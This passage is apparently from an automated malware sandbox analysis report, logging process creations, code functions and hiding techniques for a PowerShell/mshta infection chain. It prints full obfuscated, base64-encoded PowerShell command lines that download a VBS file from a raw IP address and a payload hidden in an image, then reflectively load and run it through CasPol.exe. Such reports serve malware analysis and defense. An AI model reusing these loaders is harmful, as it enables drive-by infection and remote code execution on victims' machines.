lQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $capellmeister = 'JG5vbmV2YWx1YXRpdmUgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskZXJ5dGhyb3N0b211bSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHBpZWhvbGVzID0gJGVyeXRocm9zdG9tdW0uRG93bmxvYWREYXRhKCRub25ldmFsdWF0aXZlKTskcGxhY29kZXJtYXRvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcGllaG9sZXMpOyRiYW5kYm94ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR5ZW1hbiA9ICc8PEJBU0U2NF9FTkQ+Pic7JHByZWxhY3kgPSAkcGxhY29kZXJtYXRvdXMuSW5kZXhPZigkYmFuZGJveCk7JGZhbWVkID0gJHBsYWNvZGVybWF0b3VzLkluZGV4T2YoJHllbWFuKTskcHJlbGFjeSAtZ2UgMCAtYW5kICRmYW1lZCAtZ3QgJHByZWxhY3k7JHByZWxhY3kgKz0gJGJhbmRib3guTGVuZ3RoOyR3aXRlbmFnZW1vdCA9ICRmYW1lZCAtICRwcmVsYWN5OyRzb3Bob21hbmlhYyA9ICRwbGFjb2Rlcm1hdG91cy5TdWJzdHJpbmcoJHByZWxhY3ksICR3aXRlbmFnZW1vdCk7JGdyaWZmaW4gPSAtam9pbiAoJHNvcGhvbWFuaWFjLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb3Bob21hbmlhYy5MZW5ndGgpXTskYXV0b3Bsb2lkeSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGdyaWZmaW4pOyRsZWRlcml0ZSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGF1dG9wbG9pZHkpOyR1bmJpb3R1cmJhdGVkID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHVuYmlvdHVyYmF0ZWQuSW52b2tlKCRudWxsLCBAKCcwLzFEYkJwL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckYmFja3NjYXR0ZXJpbmdzJywgJyRiYWNrc2NhdHRlcmluZ3MnLCAnJGJhY2tzY2F0dGVyaW5ncycsICdDYXNQb2wnLCAnJGJhY2tzY2F0dGVyaW5ncycsICckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCcxJywnJGJhY2tzY2F0dGVyaW5ncycsJycpKTs=';$hypoxanthine = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($capellmeister));Invoke-Expression $hypoxanthine
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $capellmeister = 'JG5vbmV2YWx1YXRpdmUgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskZXJ5dGhyb3N0b211bSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHBpZWhvbGVzID0gJGVyeXRocm9zdG9tdW0uRG93bmxvYWREYXRhKCRub25ldmFsdWF0aXZlKTskcGxhY29kZXJtYXRvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcGllaG9sZXMpOyRiYW5kYm94ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR5ZW1hbiA9ICc8PEJBU0U2NF9FTkQ+Pic7JHByZWxhY3kgPSAkcGxhY29kZXJtYXRvdXMuSW5kZXhPZigkYmFuZGJveCk7JGZhbWVkID0gJHBsYWNvZGVybWF0b3VzLkluZGV4T2YoJHllbWFuKTskcHJlbGFjeSAtZ2UgMCAtYW5kICRmYW1lZCAtZ3QgJHByZWxhY3k7JHByZWxhY3kgKz0gJGJhbmRib3guTGVuZ3RoOyR3aXRlbmFnZW1vdCA9ICRmYW1lZCAtICRwcmVsYWN5OyRzb3Bob21hbmlhYyA9ICRwbGFjb2Rlcm1hdG91cy5TdWJzdHJpbmcoJHByZWxhY3ksICR3aXRlbmFnZW1vdCk7JGdyaWZmaW4gPSAtam9pbiAoJHNvcGhvbWFuaWFjLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb3Bob21hbmlhYy5MZW5ndGgpXTskYXV0b3Bsb2lkeSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGdyaWZmaW4pOyRsZWRlcml0ZSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGF1dG9wbG9pZHkpOyR1bmJpb3R1cmJhdGVkID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHVuYmlvdHVyYmF0ZWQuSW52b2tlKCRudWxsLCBAKCcwLzFEYkJwL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckYmFja3NjYXR0ZXJpbmdzJywgJyRiYWNrc2NhdHRlcmluZ3MnLCAnJGJhY2tzY2F0dGVyaW5ncycsICdDYXNQb2wnLCAnJGJhY2tzY2F0dGVyaW5ncycsICckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCcxJywnJGJhY2tzY2F0dGVyaW5ncycsJycpKTs=';$hypoxanthine = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($capellmeister));Invoke-Expression $hypoxanthineJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.cmdline"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.cmdline"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCF3
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07071F40 push esp; iretd 3_2_07072175
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_0707216C push esp; iretd 3_2_07072175
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00434006 push ecx; ret 12_2_00434019
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004567F0 push eax; ret 12_2_0045680E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0045B9DD push esi; ret 12_2_0045B9E6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00455EBF push ecx; ret 12_2_00455ED2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_10002806 push ecx; ret 12_2_10002819
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_10009FD8 push esi; ret 12_2_10009FD9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0044693D push ecx; ret 13_2_0044694D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0044DB70 push eax; ret 13_2_0044DB84
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0044DB70 push eax; ret 13_2_0044DBAC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00451D54 push eax; ret 13_2_00451D61
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_0044B090 push eax; ret 14_2_0044B0A4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_0044B090 push eax; ret 14_2_0044B0CC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_00444E71 push ecx; ret 14_2_00444E81
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_00414060 push eax; ret 15_2_00414074
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_00414060 push eax; ret 15_2_0041409C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_00414039 push ecx; ret 15_2_00414049
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_004164EB push 0000006Ah; retf 15_2_004165C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_00416553 push 0000006Ah; retf 15_2_004165C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_00416555 push 0000006Ah; retf 15_2_004165C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406128 ShellExecuteW,URLDownloadToFileW,12_2_00406128
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_00419BD4

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCF3
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
